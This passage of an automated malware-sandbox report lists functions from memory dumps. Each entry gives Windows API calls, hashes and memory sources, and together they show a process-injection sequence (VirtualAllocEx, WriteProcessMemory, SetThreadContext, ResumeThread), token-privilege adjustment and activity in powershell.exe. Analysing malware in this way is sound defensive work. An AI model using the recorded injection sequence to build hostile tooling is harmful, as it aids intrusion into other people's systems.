                                                    • Opcode Fuzzy Hash: ad53979340c14bcedb65d3f69ed0da372ee5c893bdcf9652fafd2da3d3c1a61c
                                                    • Instruction Fuzzy Hash: 21F01CB5D541098FCB44EF74D4595D97FF0FF58200B11866AC40A93A19EB741A52CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D1998, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19CA
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: c94f9b30203429ead2267da19c99bb8caa8b822dde94a4e7412265a8bfec64e5
                                                    • Instruction ID: c02268e1dbadc055b72f452457143613990b03c8a97ef31a570f62c6fb995745
                                                    • Opcode Fuzzy Hash: c94f9b30203429ead2267da19c99bb8caa8b822dde94a4e7412265a8bfec64e5
                                                    • Instruction Fuzzy Hash: 7DE01AB89142098F8744EF68E9445997BF0FB4C200B10856AC80AD3B15EB345951CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D4854, Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002D4A96
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: c4586ef5f768e30e81c8da832ca32b582a8189854cb141dfe2a8faad1ca75703
                                                    • Instruction ID: 185af8d21963916c53c35b186126ede77f6008192e9b99afb1c588fba9edaddd
                                                    • Opcode Fuzzy Hash: c4586ef5f768e30e81c8da832ca32b582a8189854cb141dfe2a8faad1ca75703
                                                    • Instruction Fuzzy Hash: 71A17871D102198FDF20DFA5C891BEEBBB2BF48314F1485AAE848A7240DB709D91CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D4860, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002D4A96
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 46e2094be5fe0253589d9ede35978d7ad8385ef5ed22c0a5120d7825ce2ad1ac
                                                    • Instruction ID: 4292a3876d170e3fbe4cc4b0ce6278e16ba3455ddd380246f61483a1dbb85089
                                                    • Opcode Fuzzy Hash: 46e2094be5fe0253589d9ede35978d7ad8385ef5ed22c0a5120d7825ce2ad1ac
                                                    • Instruction Fuzzy Hash: E6916871D1021A8FDF10DFA5C891BEEBBB2BF48314F14856AE848A7244DB709D95CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D3FD1, Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002D4068
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 70bc2be1d11d12eb4150b1d648db0e6dcee463933cdb28acac8505e246d1b691
                                                    • Instruction ID: cb3eaf2d1d5ae298f82d925349e88e87c28fd6f0667d7903332b52ebc45e7fae
                                                    • Opcode Fuzzy Hash: 70bc2be1d11d12eb4150b1d648db0e6dcee463933cdb28acac8505e246d1b691
                                                    • Instruction Fuzzy Hash: 602148719002499FCB10CFA9C884BEEBBF5FF88314F10882AE959A7340D7799954CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D3FD8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002D4068
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 31bccf0fad6881ce30adf2a7165254383cb9948c350835d699fcaa2c50017e8c
                                                    • Instruction ID: ab5745d207591612e73eee65c5e2cc34d6f834663821ef2d06f8c70c620a6cca
                                                    • Opcode Fuzzy Hash: 31bccf0fad6881ce30adf2a7165254383cb9948c350835d699fcaa2c50017e8c
                                                    • Instruction Fuzzy Hash: 952127719003499FCB10DFA9C884BDEBBF5FF48314F50882AE959A7340D778A950CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D3838, Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002D38BE
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: e3add46be73af404cf52ef13019f5ec6e9987e0090e7799e2e8dad0656f92489
                                                    • Instruction ID: f911b08734f999ee4607169244a2b4e9f7b0e4fb9fbb281a29b2e560f5f73eda
                                                    • Opcode Fuzzy Hash: e3add46be73af404cf52ef13019f5ec6e9987e0090e7799e2e8dad0656f92489
                                                    • Instruction Fuzzy Hash: D5213971D002098FDB10CFA9C4847EEBBF5EF89314F14882AD459A7340DB789A45CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D3840, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002D38BE
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 27df06ca0a2076149975698998fd86db9dde66e785e4f816ca9aecac168c824b
                                                    • Instruction ID: 8d84c13bd1c37b7d5f4007b3cca366b9de56a1a237daaa819d80da4b613398b8
                                                    • Opcode Fuzzy Hash: 27df06ca0a2076149975698998fd86db9dde66e785e4f816ca9aecac168c824b
                                                    • Instruction Fuzzy Hash: 8F211871D002098FDB10CFAAC4847EEBBF5EF88314F54882AD459A7340DB78AA45CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D42C8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002D4348
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: e5702b37822a46c5851d3a4276c7bd144426759f18c1fe2485531344b0851701
                                                    • Instruction ID: 241c48398436c8029f2445bed6af972749aa3aa22b9e0de082a15e84f32bda49
                                                    • Opcode Fuzzy Hash: e5702b37822a46c5851d3a4276c7bd144426759f18c1fe2485531344b0851701
                                                    • Instruction Fuzzy Hash: 372128719002099FCB10DFAAC844BEEFBF5FF48310F50882AE919A7240D774A911CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D3D10, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002D3D86
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: d3194db631012643888cafbfbf80641f24e23a3b1530d21d3dc62ef99171bccc
                                                    • Instruction ID: 8c090fb2387aa3a3d6f204fb950246b69d7be3bec17975105836c71840f4bcff
                                                    • Opcode Fuzzy Hash: d3194db631012643888cafbfbf80641f24e23a3b1530d21d3dc62ef99171bccc
                                                    • Instruction Fuzzy Hash: 292159719002099FCB10CFA9D844BEFBFF6EF89314F24881AD419A7250C775A950CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D3D18, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002D3D86
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: c8b187718c3d45fcf6eb46dd7ac2e1db4d0280b460e62ec10f78aafdbdbf92ea
                                                    • Instruction ID: 839244636c2b94f45ee6be11d2ad6681abd289285835d16e4cade1b07c417c6c
                                                    • Opcode Fuzzy Hash: c8b187718c3d45fcf6eb46dd7ac2e1db4d0280b460e62ec10f78aafdbdbf92ea
                                                    • Instruction Fuzzy Hash: E31137719002099FCB10DFAAC844BDFBBF6EF88314F24881AD519A7250C775AA50CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D5298, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 93d62c5729b376c496972c844a257a37732adce08dc0a4519c095958d523a335
                                                    • Instruction ID: edccbafe68dcbb27a0dc6ea198650bff149e0a7c689ccaa1e47544072dbc4024
                                                    • Opcode Fuzzy Hash: 93d62c5729b376c496972c844a257a37732adce08dc0a4519c095958d523a335
                                                    • Instruction Fuzzy Hash: B01146B1D002498FCB20CFA9C4487DFFBF6AF89324F24881AD459A7240C7B4A941CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002D52A0, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 536c70691690e9673d08c152b4e013210e56721040a1a365ba0a65350d14df08
                                                    • Instruction ID: 000938ee381f6ad2f9f8097ee43f1bbd60a37113f1541535c7fb924efccfc8e8
                                                    • Opcode Fuzzy Hash: 536c70691690e9673d08c152b4e013210e56721040a1a365ba0a65350d14df08
                                                    • Instruction Fuzzy Hash: 081128719003098BCB10CFAAC4447DFFBF9AF88214F24881AC419A7340C7B4A940CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181395845.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80bb61cd9ac72250f257f28bfbf837dbb5afff2bcb6aa6538118fccd2e344e3c
                                                    • Instruction ID: d27d3c5e95518e52003fbc8dc52dfdc7258f83b5557831fa0b070b6754e4cc30
                                                    • Opcode Fuzzy Hash: 80bb61cd9ac72250f257f28bfbf837dbb5afff2bcb6aa6538118fccd2e344e3c
                                                    • Instruction Fuzzy Hash: CD21C275604248DFDB14DF64E984B16BBB5EF88314F24C9A9E80D4B346C336D857CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181395845.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1700bc627077445881ccf50647105a7c1c58688abe36ab452bc5987d94b425a
                                                    • Instruction ID: b8869592c909ac21c2eb3fc3572bdc4f3e37cbf0d58d7e81a14b19e07cf2342b
                                                    • Opcode Fuzzy Hash: d1700bc627077445881ccf50647105a7c1c58688abe36ab452bc5987d94b425a
                                                    • Instruction Fuzzy Hash: 3C215B755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2252 Parent PID: 2336 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 0211ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0211AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 1b08322903ceb181803a430499ff282db8cb932d606026b30d989677bd395f65
                                                    • Instruction ID: 445dc23de2af6f577f49728810b8d372981fc97515f7a0f9fcd13908058d5093
                                                    • Opcode Fuzzy Hash: 1b08322903ceb181803a430499ff282db8cb932d606026b30d989677bd395f65
                                                    • Instruction Fuzzy Hash: D221BF765097C49FEB228F25DC44B92BFB4EF06210F0884AAE9848B163D3319908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0211AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 8417a53cd7b0b78e1bbdaf42c80b7b0f777e1044eb9ac8389fad9e7888e0b73a
                                                    • Instruction ID: 5b6fd46a94b49f3addf1c86fdd7d62e9dbc8d3a098e65895a4d6561ce1923ef0
                                                    • Opcode Fuzzy Hash: 8417a53cd7b0b78e1bbdaf42c80b7b0f777e1044eb9ac8389fad9e7888e0b73a
                                                    • Instruction Fuzzy Hash: CA115A76501B449FEF21CF55D884BA6FFE4EF04221F08C4AAED498B662D732E414DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0211B329
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 9e7641abd6e27722695ddfd48db3413384ee75933ab8fb658c7d37f41f166199
                                                    • Instruction ID: 622cc0860b3bbc131827a97f972335a5b552133f482eadfd6358b0df50a4fb6b
                                                    • Opcode Fuzzy Hash: 9e7641abd6e27722695ddfd48db3413384ee75933ab8fb658c7d37f41f166199
                                                    • Instruction Fuzzy Hash: 1811A071509380AFDB228F11DC45F52FFB4EF46224F09C49AED884B662C375A918DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0211B329
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 10134c952d54f389c27348caa5dc5a8c7aed0ab048e248f571029bd7e2922692
                                                    • Instruction ID: 340f83cf7ac0469f62b45afef93b1d5dd28bbcea4c8db81af69c3809f148981b
                                                    • Opcode Fuzzy Hash: 10134c952d54f389c27348caa5dc5a8c7aed0ab048e248f571029bd7e2922692
                                                    • Instruction Fuzzy Hash: 2801AD35418740DFEB20CF05D885B22FBA0EF04724F08C4AADD494B652C375A528DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: befc6e908fa4e44f81737a79be2fa8ff3efc7df8a38dff5c481a956a4ff00f01
                                                    • Instruction ID: d81828ecf347eddd99aadfc7202c504c24e935c3096ac9747fa1d85a7008309f
                                                    • Opcode Fuzzy Hash: befc6e908fa4e44f81737a79be2fa8ff3efc7df8a38dff5c481a956a4ff00f01
                                                    • Instruction Fuzzy Hash: 31314C7950E7C08FE7138B759C65691BFB4AF43220F0E84DBD884CF1A3D6659809D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: d858e810991b5ec4403dcab4db6a329ec60d24c911acbaacd785e6d9b4d56e3a
                                                    • Instruction ID: e67b2b2925c73ce52cd8ff726d06a3407528271b985611f25c87d95dd35b25df
                                                    • Opcode Fuzzy Hash: d858e810991b5ec4403dcab4db6a329ec60d24c911acbaacd785e6d9b4d56e3a
                                                    • Instruction Fuzzy Hash: 01315075505380AFE722DF65CC45F56BFF8EF06210F09849EE989CB292D365A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 346eab2a0603920c26a982306051a1a858c4ed974698e7a5e71ea3b1905102ac
                                                    • Instruction ID: 3dc5326f0442adc4a3db6c8957a85e5196855238ebf96e458a272381cef0e24f
                                                    • Opcode Fuzzy Hash: 346eab2a0603920c26a982306051a1a858c4ed974698e7a5e71ea3b1905102ac
                                                    • Instruction Fuzzy Hash: CA319875509380AFE712DB25DC45B96BFE8DF06314F0884AAE988CF293D375A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 8ff51621be054f429dc2d6670d35054ef2b65327539e6da7ba57d9c0cbafdd35
                                                    • Instruction ID: 54178e139452b0fc36ef4f5924a7a3d3e02c132a2f4e7738a0f1579b24ae39b2
                                                    • Opcode Fuzzy Hash: 8ff51621be054f429dc2d6670d35054ef2b65327539e6da7ba57d9c0cbafdd35
                                                    • Instruction Fuzzy Hash: AB31C372109380AFE722CB61CC55F96BFB8EF06210F0884DBF984CB192D224A908C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 03199f8d88f7959368816cb5b2ce372bc5836547755b4475b624eab6dd954bbd
                                                    • Instruction ID: e7fbf6038f9d019293f0f7cda86601132c8f8a2e5c8746ab9b8ebf870e98a23e
                                                    • Opcode Fuzzy Hash: 03199f8d88f7959368816cb5b2ce372bc5836547755b4475b624eab6dd954bbd
                                                    • Instruction Fuzzy Hash: 7021D5B2509380AFE712CF20DC45B96BFB8EF06320F0884EAE984DB193C3359945C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: dee6143ade53929c9af11a84765d385d4efe0293b07cc44e58ccc12aff1e5302
                                                    • Instruction ID: 2751787b74c5bf6d255ee8e500811c6dfa6a3a50e10ba4e22575d0c3a44d5d34
                                                    • Opcode Fuzzy Hash: dee6143ade53929c9af11a84765d385d4efe0293b07cc44e58ccc12aff1e5302
                                                    • Instruction Fuzzy Hash: 0A316F7550E3C06FD3138B358C55B56BFB4AF47610F1A81DBD8848F2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 0211B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 2d3a839e107a7bfbf152478dab27f33e8d4b5d11af46e2729ae754f5d27d6e69
                                                    • Instruction ID: 8236ee3283c830ba22688a85c79471bddb8591d741e65f7c89aa65795010a768
                                                    • Opcode Fuzzy Hash: 2d3a839e107a7bfbf152478dab27f33e8d4b5d11af46e2729ae754f5d27d6e69
                                                    • Instruction Fuzzy Hash: E321D371509380AFE722CF11CC44FA6BFB8EF02220F0884AAE945CB192D774E948CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0211A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 0da9ef61b504e47ae4720f40e490b31e0478df0595d1c0b6092f8d39d084b08b
                                                    • Instruction ID: 8bf2b9673fad93bafe3032f2ede4db9311c5bb0157340cb07306ff4a79727851
                                                    • Opcode Fuzzy Hash: 0da9ef61b504e47ae4720f40e490b31e0478df0595d1c0b6092f8d39d084b08b
                                                    • Instruction Fuzzy Hash: B921E57140D3C06FD302CB258C55B66BFB4EF43220F1981DFD8848F693D228A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: db88d95c41f111cfacd25311bf36ed06babb54539d0c6200abda4de986f6357e
                                                    • Instruction ID: 41fb7ae1765be6862bb2329699d6d85cc2509860f5c8f4a5a6ab7b462b973651
                                                    • Opcode Fuzzy Hash: db88d95c41f111cfacd25311bf36ed06babb54539d0c6200abda4de986f6357e
                                                    • Instruction Fuzzy Hash: F321DA76409780AFE712CB159C45FA3BFA8EF46720F0981DBF9888F193D224A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: bcb3f363ccda4727aea67a3c351a71bbb51ef7837a50d102cbb5c72088c75372
                                                    • Instruction ID: 3ee80bbeed329141a761aaa079462efd7dca3bafaf2c56f80b5973665e035ac5
                                                    • Opcode Fuzzy Hash: bcb3f363ccda4727aea67a3c351a71bbb51ef7837a50d102cbb5c72088c75372
                                                    • Instruction Fuzzy Hash: 4C217F7540E3C0AFD3128B358C55B66BFB4EF87610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028806AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 9f1cbf56992521f66a7d1bbcbc97c843ba48125565a8dcc4456dc01eb1fdf5d2
                                                    • Instruction ID: a685f740e5cf08c962de08d286b7361212ff17416bcf25909db4838e0a84255d
                                                    • Opcode Fuzzy Hash: 9f1cbf56992521f66a7d1bbcbc97c843ba48125565a8dcc4456dc01eb1fdf5d2
                                                    • Instruction Fuzzy Hash: 73218E79500704EFE721EF65CD85F66FBE8EF08650F04846AE949CB292D772E908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6F99BA0B,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 91dc4a9fca4a7e92c6fe352d43935aa2792d8aaf4fe03727c48022bcacacbcb2
